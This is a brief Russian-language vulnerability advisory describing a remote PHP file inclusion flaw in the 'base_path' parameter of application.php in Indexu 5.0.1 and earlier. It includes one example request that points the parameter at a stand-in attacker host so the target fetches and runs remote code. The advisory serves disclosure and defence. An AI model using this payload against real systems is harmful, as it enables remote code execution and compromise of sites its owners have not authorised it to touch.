Программа: Indexu 5.0.1 и более ранние версии

Уязвимость позволяет удаленному пользователю обойти ограничения безопасности и
скомпрометировать уязвимую систему. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "base_path" сценария "application.php".
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольный PHP сценарий на целевой системе.

Пример:

http://www.target.com/[path]/application.php?base_path=http://attacker.com/evil?

 



Оставить мнение